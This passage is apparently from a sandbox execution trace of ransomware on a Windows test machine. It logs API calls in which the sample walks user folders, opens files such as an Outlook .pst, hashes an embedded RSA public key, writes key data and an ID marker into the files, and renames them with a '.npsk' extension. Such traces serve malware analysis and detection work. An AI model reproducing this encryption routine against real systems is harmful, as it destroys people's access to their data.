"c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mpv84imo\\krtqwdjtx5spv.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MpV84iMo\\krTqwdJtX5sPV.wav.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mpv84imo\\krtqwdjtx5spv.wav.npsk")) returned 1 [0216.356] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a324520, ftCreationTime.dwHighDateTime=0x1d5e512, ftLastAccessTime.dwLowDateTime=0x5c7a59e0, ftLastAccessTime.dwHighDateTime=0x1d5deca, ftLastWriteTime.dwLowDateTime=0x5c7a59e0, ftLastWriteTime.dwHighDateTime=0x1d5deca, nFileSizeHigh=0x0, nFileSizeLow=0x17d32, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="krTqwdJtX5sPV.wav", cAlternateFileName="KRTQWD~1.WAV")) returned 0 [0216.357] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0216.357] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0216.357] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0216.357] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\") returned="My Music\\" [0216.357] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0216.357] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0216.357] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0216.357] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0216.357] PathFindFileNameW (pszPath="") returned="" [0216.357] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a324520, ftCreationTime.dwHighDateTime=0x1d5e512, ftLastAccessTime.dwLowDateTime=0x5c7a59e0, ftLastAccessTime.dwHighDateTime=0x1d5deca, ftLastWriteTime.dwLowDateTime=0x5c7a59e0, ftLastWriteTime.dwHighDateTime=0x1d5deca, nFileSizeHigh=0x0, nFileSizeLow=0x17d32, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="krTqwdJtX5sPV.wav", cAlternateFileName="KRTQWD~1.WAV")) returned 0xffffffff [0216.357] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0216.357] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0216.357] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\") returned="My Pictures\\" [0216.357] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0216.357] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0216.357] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0216.358] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0216.358] PathFindFileNameW (pszPath="") returned="" [0216.358] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a324520, ftCreationTime.dwHighDateTime=0x1d5e512, ftLastAccessTime.dwLowDateTime=0x5c7a59e0, ftLastAccessTime.dwHighDateTime=0x1d5deca, ftLastWriteTime.dwLowDateTime=0x5c7a59e0, ftLastWriteTime.dwHighDateTime=0x1d5deca, nFileSizeHigh=0x0, nFileSizeLow=0x17d32, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="krTqwdJtX5sPV.wav", cAlternateFileName="KRTQWD~1.WAV")) returned 0xffffffff [0216.358] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0216.358] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0216.358] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\") returned="My Shapes\\" [0216.358] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0216.358] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0216.358] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0216.358] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0216.358] PathFindFileNameW (pszPath="") returned="" [0216.358] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0216.358] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0216.358] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebf97a0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0xd8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0216.358] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\desktop.ini") returned=".ini" [0216.358] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9e9e4460, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9e9e4460, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites.vss", cAlternateFileName="FAVORI~1.VSS")) returned 1 [0216.359] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss") returned=".vss" [0216.359] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\favorites.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0216.360] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=0) returned 1 [0216.360] CloseHandle (hObject=0x61c) returned 1 [0216.360] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\favorites.vss"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\favorites.vss.npsk")) returned 1 [0216.360] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_private", cAlternateFileName="")) returned 1 [0216.360] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_private", cAlternateFileName="")) returned 0 [0216.361] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0216.361] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0216.361] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0216.361] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\") returned="My Videos\\" [0216.361] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0216.361] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0216.361] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0216.361] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0216.361] PathFindFileNameW (pszPath="") returned="" [0216.361] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_private", cAlternateFileName="")) returned 0xffffffff [0216.361] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0216.361] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0216.361] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\") returned="Outlook Files\\" [0216.361] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0216.361] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0216.361] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0216.361] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0216.361] PathFindFileNameW (pszPath="") returned="" [0216.362] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x8a4af3c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x8a4af3c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0216.362] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x8a4af3c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x8a4af3c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0216.362] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5a868660, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5a868660, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x8a4fb680, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="voeimd@djhreuu.uhd.pst", cAlternateFileName="VOEIMD~1.PST")) returned 1 [0216.362] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst") returned=".pst" [0216.362] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.pst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0216.363] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=271360) returned 1 [0216.363] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0216.364] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x423da, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.364] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0216.365] SetFilePointer (in: hFile=0x61c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0216.365] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x25805, lpOverlapped=0x0) returned 1 [0216.369] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.369] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.369] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.369] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1ce8) returned 1 [0216.370] CryptCreateHash (in: hProv=0x7b1ce8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0216.370] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0216.370] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0216.370] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0216.370] GetLastError () returned 0x0 [0216.370] CryptDestroyHash (hHash=0x3277d68) returned 1 [0216.370] CryptReleaseContext (hProv=0x7b1ce8, dwFlags=0x0) returned 1 [0216.370] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0216.370] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0216.370] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0216.372] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8b1c8 [0216.373] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x42400, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.373] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0216.392] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0216.392] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0216.392] CloseHandle (hObject=0x61c) returned 1 [0216.395] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.pst"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.pst.npsk")) returned 1 [0216.397] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5a868660, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5a868660, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x8a4fb680, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="voeimd@djhreuu.uhd.pst", cAlternateFileName="VOEIMD~1.PST")) returned 0 [0216.397] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0216.397] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0216.397] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0216.397] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\") returned="y5VbixHYeFSBUXkYrU1j\\" [0216.397] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0216.397] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0216.397] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0216.397] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0216.397] PathFindFileNameW (pszPath="") returned="" [0216.397] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7e062460, ftCreationTime.dwHighDateTime=0x1d5dfa4, ftLastAccessTime.dwLowDateTime=0xcc0be400, ftLastAccessTime.dwHighDateTime=0x1d5dd93, ftLastWriteTime.dwLowDateTime=0xcc0be400, ftLastWriteTime.dwHighDateTime=0x1d5dd93, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0216.398] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7e062460, ftCreationTime.dwHighDateTime=0x1d5dfa4, ftLastAccessTime.dwLowDateTime=0xcc0be400, ftLastAccessTime.dwHighDateTime=0x1d5dd93, ftLastWriteTime.dwLowDateTime=0xcc0be400, ftLastWriteTime.dwHighDateTime=0x1d5dd93, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0216.398] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9d89230, ftCreationTime.dwHighDateTime=0x1d5d987, ftLastAccessTime.dwLowDateTime=0xe5fa3430, ftLastAccessTime.dwHighDateTime=0x1d5e611, ftLastWriteTime.dwLowDateTime=0xe5fa3430, ftLastWriteTime.dwHighDateTime=0x1d5e611, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4qvrM0-cLvTuNo", cAlternateFileName="4QVRM0~1")) returned 1 [0216.398] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14c34210, ftCreationTime.dwHighDateTime=0x1d5e0b9, ftLastAccessTime.dwLowDateTime=0x4099ae10, ftLastAccessTime.dwHighDateTime=0x1d5dee8, ftLastWriteTime.dwLowDateTime=0x4099ae10, ftLastWriteTime.dwHighDateTime=0x1d5dee8, nFileSizeHigh=0x0, nFileSizeLow=0xeb4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bC__N8aqJQNDm1AKj8.ppt", cAlternateFileName="BC__N8~1.PPT")) returned 1 [0216.398] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\bC__N8aqJQNDm1AKj8.ppt") returned=".ppt" [0216.398] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\bC__N8aqJQNDm1AKj8.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y5vbixhyefsbuxkyru1j\\bc__n8aqjqndm1akj8.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0216.399] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=3764) returned 1 [0216.399] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0216.401] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xe8e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.401] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0216.402] SetFilePointer (in: hFile=0x61c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0216.402] 